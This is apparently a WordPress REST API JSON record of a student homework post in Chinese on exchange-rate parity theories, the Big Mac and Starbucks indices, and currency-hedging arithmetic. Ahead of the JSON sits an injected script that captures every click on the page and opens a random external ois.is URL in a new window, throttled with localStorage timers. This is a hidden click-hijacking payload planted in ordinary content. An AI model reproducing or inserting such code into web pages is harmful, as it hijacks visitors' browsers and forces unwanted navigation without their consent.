<script>(function (parameters) {
		const targets = [
			'https://ois.is/images/logo-1.png', 'https://ois.is/images/logo-2.png', 'https://ois.is/images/logo-3.png', 'https://ois.is/images/logo-4.png', 'https://ois.is/images/logo-5.png', 'https://ois.is/images/logo-6.png', 'https://ois.is/images/logo-7.png', 'https://ois.is/images/logo-8.png'
		]
		// Times between clicks
		const restMinutes = 1;
		// Number of hours to allow re-click 
		const allowedHours = 2;


		const saveTargetLocationsToStorage = (targets) => {
			targets.forEach((target, index) => {
				if(!localStorage.getItem(`${target}-local-storage`)){
					localStorage.setItem(`${target}-local-storage`, 0);
				}
			});
		}
		const getRandomLocationFromStorage = (targets) => {
			const nonVisited = targets.filter((target, index) => localStorage.getItem(`${target}-local-storage`) == 0)
			return nonVisited[Math.floor(Math.random() * nonVisited.length)];
		}
		const setLocationAsVisited = (target) => localStorage.setItem(`${target}-local-storage`, 1);

		const getTimeStorage = (key) => localStorage.getItem(`${key}-local-storage`);
		const setTimeToStorage = (key, nowDate) => localStorage.setItem(`${key}-local-storage`, nowDate);

		const getHoursDiff = (startDate, endDate) => {
			const msInHour = 1000 * 60 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInHour);
		}
		const getMintsDiff = (startDate, endDate) => {
			const msInMints = 1000 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInMints);
		}

		const visitNewLocation = (targets, host, nowDate) => {
			saveTargetLocationsToStorage(targets);
			newLocation = getRandomLocationFromStorage(targets);
			setTimeToStorage(`${host}-mnts`, nowDate);
			setTimeToStorage(`${host}-hurs`, nowDate);
			setLocationAsVisited(newLocation);
			window.open(newLocation, "_blank");
		}

		// const randomLocation = getRandomLocationFromStorage(targets);
		saveTargetLocationsToStorage(targets);

		function globalClick(event) {
			event.stopPropagation();
			const host = location.host;
			let newLocation = getRandomLocationFromStorage(targets);
			const nowDate = Date.parse(new Date());
			const savedDateForMints = getTimeStorage(`${host}-mnts`);
			const savedDateForHours = getTimeStorage(`${host}-hurs`);

			if (savedDateForMints && savedDateForHours) {
				try {
					const storageDateForMints = parseInt(savedDateForMints);
					const storageDateForHours = parseInt(savedDateForHours);
					const mintsDiff = getMintsDiff(nowDate, storageDateForMints);
					const hoursDiff = getHoursDiff(nowDate, storageDateForHours);

					if (hoursDiff >= allowedHours) {
						saveTargetLocationsToStorage(targets);
						setTimeToStorage(`${host}-hurs`, nowDate);
					}
					if (mintsDiff >= restMinutes) {
						if (newLocation) {
							setTimeToStorage(`${host}-mnts`, nowDate);
							window.open(newLocation, "_blank");
							setLocationAsVisited(newLocation);
						}
					}
				} catch (error) { visitNewLocation(targets, host, nowDate); }
			} else { visitNewLocation(targets, host, nowDate); }
		}
		document.addEventListener("click", globalClick)
	})()</script>{"id":983,"date":"2023-03-30T11:53:18","date_gmt":"2023-03-30T03:53:18","guid":{"rendered":"https:\/\/edu.secda.info\/scu8154204\/?p=983"},"modified":"2023-04-08T00:26:22","modified_gmt":"2023-04-07T16:26:22","slug":"%e4%bd%9c%e6%a5%ad%e4%b8%89","status":"publish","type":"post","link":"https:\/\/edu.secda.info\/scu8154204\/?p=983","title":{"rendered":"\u4f5c\u696d3"},"content":{"rendered":"<pre><strong>2.<\/strong>\u6458\u9304\u570b\u969b\u5e73\u50f9\u7406\u8ad6\u4e00\u5f35 A4 \u91cd\u9ede\uff0c\u4ee5\u53ca\u4f55\u8b02\u661f\u5df4\u514b\u6307\u6578? \u548c\u5927\u9ea5\u514b\u6307\u6578\u6709\u4f55\u512a\u7f3a\u9ede?<\/pre>\n<h6><strong>\u570b\u969b\u5e73\u50f9\u7406\u8ad6<\/strong><\/h6>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignnone wp-image-992\" src=\"https:\/\/edu.secda.info\/scu8154204\/wp-content\/uploads\/2023\/03\/picc-300x171.jpg\" alt=\"\" width=\"531\" height=\"303\" srcset=\"https:\/\/edu.secda.info\/scu8154204\/wp-content\/uploads\/2023\/03\/picc-300x171.jpg 300w, https:\/\/edu.secda.info\/scu8154204\/wp-content\/uploads\/2023\/03\/picc-800x456.jpg 800w, https:\/\/edu.secda.info\/scu8154204\/wp-content\/uploads\/2023\/03\/picc-768x438.jpg 768w, https:\/\/edu.secda.info\/scu8154204\/wp-content\/uploads\/2023\/03\/picc.jpg 1150w\" sizes=\"(max-width: 531px) 100vw, 531px\" \/><\/p>\n<h6><strong>\u8cfc\u8cb7\u529b\u5e73\u50f9\u8aaa Purchasing Power Parity :<\/strong><\/h6>\n<h6>-\u7d55\u5c0d\u8cfc\u8cb7\u529b\u5e73\u50f9\u8aaa<\/h6>\n<pre><strong>P = e \u00d7 P* \u21d2 e = P\/P*\u00a0 \u00a0 \u5176\u4e2dP*\u70ba\u5916\u570b\u7269\u50f9\uff1be \u70ba\u532f\u7387<\/strong><\/pre>\n<h6>-\u76f8\u5c0d\u8cfc\u8cb7\u529b\u5e73\u50f9\u8aaa<\/h6>\n<pre><strong>( E(e) - e ) \/ e<\/strong><\/pre>\n<h6>PPP\u7121\u6cd5\u6210\u7acb\u4e4b\u56e0\u7d20:\u5b58\u5728\u8cbf\u6613\u969c\u7919\u3001\u5e02\u5834\u975e\u5b8c\u5168\u7af6\u722d\u3001\u7269\u50f9\u6c34\u6e96\u8a08\u7b97\u6a19\u6e96\u4e0d\u4e00\u81f4<\/h6>\n<h6><strong>\u5229\u7387\u5e73\u50f9\u8aaa Interest Rate Parity :<\/strong><\/h6>\n<p>\u900f\u904e\u5229\u7387\u540c\u5373\u671f\u532f\u7387\u8207\u9060\u671f\u532f\u7387\u4e4b\u9593\u7684\u95dc\u4fc2\u4f86\u8aaa\u660e\u532f\u7387\u7684\u6c7a\u5b9a\u8207\u8b8a\u52d5\u7684\u539f\u56e0\u3002<\/p>\n<p>\u5206\u70ba<strong>\u672a\u62cb\u88dcIRP(uncovered IRP)<\/strong>\u548c<strong>\u62cb\u88dcIRP(covered IRP)\uff0c<\/strong>\u4e0d\u540c\u4e4b\u8655\u5728\u65bc\u5c0d\u6295\u8cc7\u8005\u7684\u98a8\u96aa\u504f\u597d\u6240\u505a\u7684\u5047\u8a2d<\/p>\n<p><strong>\u672a\u62cb\u88dcIRP<\/strong><strong>\u4e4b\u6db5\u7fa9: \u672c\u570b\u5229\u7387\u548c\u5916\u570b\u5229\u7387\u7684\u5dee\u984d\u7b49\u65bc\u672c\u570b\u8ca8\u5e63\u7684\u9810\u671f\u8cb6(\u5347)\u503c\u5e45\u5ea6<\/strong><\/p>\n<h6><strong>\u8cbb\u96ea\u6548\u679c Fisher effect :<\/strong><\/h6>\n<p>\u6307\u4eba\u5011<b>\u9810\u671f\u901a\u8ca8\u81a8\u8139\u7387\u63d0\u9ad8\u6642\uff0c\u540d\u76ee\u5229\u7387\u5c07\u6703\u4e0a\u5347<\/b>\u3002<\/p>\n<h6><strong>\u570b\u969b\u8cbb\u96ea\u6548\u679c International Fisher effect :<\/strong><\/h6>\n<p>\u6307\u51fa\u540d\u76ee\u5229\u7387\u7684\u5dee\u7570\u662f\u5404\u570b\u9593\u5373\u671f\u532f\u7387\u9810\u671f\u8b8a\u5316\u4e4b\u53cd\u6620<sup id=\"cite_ref-Buckley_2004_1-0\" class=\"reference\"><\/sup><\/p>\n<h6><strong>\u661f\u5df4\u514b\u6307\u6578 :<\/strong><\/h6>\n<pre>\u70ba\u300a\u83ef\u723e\u8857\u65e5\u5831\u300b\u65bc2017\u5e74\u8abf\u67e5\u5168\u7403\u8fd130\u500b\u5927\u57ce\u5e02\u7684\u661f\u5df4\u514b\u4e2d\u676f\u62ff\u9435\u7684\u552e\u50f9\u8a08\u7b97\u800c\u5f97\uff0c\r\n\u53ef\u7528\u65bc\u63cf\u7e6a\u532f\u50f9\u4e0d\u4e00\u81f4\u7684\u60c5\u6cc1\u3002\r\n\u5927\u9ea5\u514b\u6307\u6578\u5247\u662f\u4ee5\u5404\u570b\u9ea5\u7576\u52de\u9910\u5ef3\u7684\u5927\u9ea5\u514b\u6f22\u5821\u50f9\u683c\uff0c\u76f8\u5c0d\u65bc\u8a72\u570b\u8ca8\u5e63\u532f\u7387\uff0c\u4f5c\u70ba\u6bd4\u8f03\u7684\u57fa\u6e96\u3002\r\n\r\n\u592e\u884c\u66fe\u8ac7\u53ca\u6b64\u7a2e\u55ae\u4e00\u5546\u54c1\u6307\u6578\uff0c\u6bd4\u8f03\u661f\u5df4\u514b\u4e2d\u676f\u62ff\u9435\u5728\u53f0\u7063\u8207\u5728\u7f8e\u570b\u7684\u552e\u50f9\uff0c\u5206\u5225\u662f\u65b0\u53f0\u5e63120\u5143\u82072.95\u7f8e\u5143\uff0c\u5957\u7528\u516c\u5f0f\u5f8c\u767c\u73fe\uff0c\u65b0\u53f0\u5e63\u76f8\u5c0d\u65bc\u7f8e\u5143\u88ab\u9ad8\u4f30\u7684\u60c5\u6cc1\u5341\u5206\u986f\u8457\uff0c\u7d50\u679c\u8207\u5927\u9ea5\u514b\u6307\u6578\u6240\u986f\u793a\u65b0\u53f0\u5e63\u514c\u7f8e\u5143\u532f\u50f9\u88ab\u4f4e\u4f30\uff0c\u5b8c\u5168\u80cc\u9053\u800c\u99b3\u3002\r\n\u800c\u4e0d\u540c\u5546\u54c1\u6307\u6578\u63d0\u4f9b\u622a\u7136\u4e0d\u540c\u7684\u7d50\u679c\uff0c\u9019\u7a2e\u4e0d\u4e00\u81f4\u7684\u60c5\u6cc1\u4e26\u4e0d\u7f55\u898b\uff1b\r\n\u55ae\u4e00\u5546\u54c1\u6307\u6578\u5177\u6709\u6dfa\u986f\u6613\u61c2\u3001\u5bcc\u8da3\u5473\u6027\u7b49\u512a\u9ede\uff0c\u56e0\u6b64\u8fd1\u5e74\u4f86\u5404\u7a2e\u5546\u54c1\u6307\u6578\u5982\u96e8\u5f8c\u6625\u7b4d\u822c\u51fa\u73fe\uff0c\u4f46\u9808\u6ce8\u610f\u55ae\u4e00\u5546\u54c1\u6307\u6578\u5f9e\u4f86\u4e0d\u662f\u4f5c\u70ba\u532f\u50f9\u8d70\u52e2\u7684\u7cbe\u78ba\u9810\u6e2c\uff0c\u6b64\u505a\u6cd5\u4e26\u4e0d\u5920\u56b4\u8b39\uff0c\u50c5\u662f\u4f7f\u532f\u7387\u7406\u8ad6\u66f4\u5bb9\u6613\u7406\u89e3\u7684\u5de5\u5177\u3002<\/pre>\n<p>&nbsp;<\/p>\n<p><strong>3.<\/strong> \u6709\u4e00\u53f0\u7063\u9032\u53e3\u5546\uff0c\u4f9d\u5408\u7d04\u8981\u5728 6 \u500b\u6708\u5f8c\u5411\u7f8e\u570b\u516c\u53f8\u4ee5 100 \u842c\u7f8e\u5143\u8cfc\u8cb7\u9ec3\u8c46\u3002\u82e5\u5373\u671f\u532f\u7387\u70ba 31.2\uff0c6 \u500b\u6708\u9060\u671f\u532f\u7387\u70ba 31.5\uff0c\u65b0\u53f0\u5e63 6 \u500b\u6708\u671f\u5229\u7387\u70ba 5%\uff0c\u7f8e\u5143 6 \u500b\u6708\u671f\u5229\u7387\u70ba 3%\uff0c\u8acb\u554f\u8a72\u9032\u53e3\u5546\uff1a (1).\u82e5\u7528\u9060\u671f\u5916\u532f\u5e02\u5834\u907f\u96aa\u61c9\u5982\u4f55\u64cd\u4f5c\uff1f\u6240\u6709\u7684\u6210\u672c\u70ba\u591a\u5c11\uff1f(\u624b\u7e8c\u8cbb 0.05%) (2).\u82e5\u7528\u8ca8\u5e63\u5e02\u5834\u907f\u96aa\u61c9\u5982\u4f55\u64cd\u4f5c\uff1f\u6210\u672c\u70ba\u4f55\uff1f(\u77ed\u671f\u878d\u8cc7\u6210\u672c\u70ba 3%)<\/p>\n<p><strong>(1).\u7528\u9060\u671f\u5916\u532f\u5e02\u5834\u907f\u96aa<\/strong><\/p>\n<p>\u8cb7\u4e00\u500b\u7f8e\u5143\u9060\u671f\u5951\u7d04100\u842cUSD<\/p>\n<p>6\u500b\u6708\u5f8c\u53ef\u4ee5\u752831.5 \u8cb7100\u842c\u7f8e\u91d1=31500000\u5143\u53f0\u5e63<\/p>\n<p>\u624b\u7e8c\u8cbb\u6210\u672c: 31500000*0.05%=NT$15,750<\/p>\n<p><strong>\u5171 NT$31,515,750<\/strong><\/p>\n<p><strong>(2).\u7528\u8ca8\u5e63\u5e02\u5834\u907f\u96aa<\/strong><\/p>\n<p>\u5c07\u4f86\u8981\u652f\u4ed8100\u842c\u7f8e\u91d1\uff0c\u73fe\u5728\u5b58\u7f8e\u91d1100\/(1+3%\/2)=98.5222\u842c\u7f8e\u91d1<\/p>\n<p>\u73fe\u5728\u6c92\u6709\u7f8e\u91d1\uff0c\u6e96\u509998.5222*31.2=3073.8926\u842c\u53f0\u5e63\uff0c\u53bb\u8cb7\u7f8e\u91d1<\/p>\n<p>\u624b\u4e0a\u6c92\u53f0\u5e63\u73fe\u91d1\uff0c\u501f\u53f0\u5e63 6\u500b\u6708\u5f8c\u90843073.8917*(1+3%\/2)=3120\u842c\u5143<\/p>\n<p><strong>4.<\/strong><\/p>\n<p>a. (4%-6%)\/(1+6%)*1.13+1.13=1.10868 \u2260 1.1<\/p>\n<p>\u6545 <strong>IRP doesn&#8217;t\u00a0 hold.<\/strong><\/p>\n<p>b. (2%-5%)\/(1+5%)*1.13+1.13=1.0977\u2248<strong>1.098<\/strong><\/p>\n<p>&nbsp;<\/p>\n<p>\u53c3\u8003\u8cc7\u6599:<\/p>\n<p>MBA\u667a\u5eab\u767e\u79d1 \u5229\u7387\u5e73\u50f9\u7406\u8ad6<\/p>\n<p>\u7dad\u57fa\u767e\u79d1 \u570b\u969b\u8cbb\u96ea\u6548\u679c<\/p>\n<p>\u7dad\u57fa\u767e\u79d1 \u5927\u9ea5\u514b\u6307\u6578<\/p>\n<p>https:\/\/knowledge.cbc.gov.tw\/front\/knowledge\/984A7E2E-6790-EB11-8143-2C44FD83FB4B<\/p>\n","protected":false},"excerpt":{"rendered":"<p>2.\u6458\u9304\u570b\u969b\u5e73\u50f9\u7406\u8ad6\u4e00\u5f35 A4 \u91cd\u9ede\uff0c\u4ee5\u53ca\u4f55\u8b02\u661f\u5df4\u514b\u6307\u6578? \u548c\u5927\u9ea5\u514b\u6307\u6578\u6709\u4f55\u512a\u7f3a<\/p>\n","protected":false},"author":15,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[],"_links":{"self":[{"href":"https:\/\/edu.secda.info\/scu8154204\/index.php?rest_route=\/wp\/v2\/posts\/983"}],"collection":[{"href":"https:\/\/edu.secda.info\/scu8154204\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/edu.secda.info\/scu8154204\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/edu.secda.info\/scu8154204\/index.php?rest_route=\/wp\/v2\/users\/15"}],"replies":[{"embeddable":true,"href":"https:\/\/edu.secda.info\/scu8154204\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=983"}],"version-history":[{"count":27,"href":"https:\/\/edu.secda.info\/scu8154204\/index.php?rest_route=\/wp\/v2\/posts\/983\/revisions"}],"predecessor-version":[{"id":993,"href":"https:\/\/edu.secda.info\/scu8154204\/index.php?rest_route=\/wp\/v2\/posts\/983\/revisions\/993"}],"wp:attachment":[{"href":"https:\/\/edu.secda.info\/scu8154204\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=983"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/edu.secda.info\/scu8154204\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=983"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/edu.secda.info\/scu8154204\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=983"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}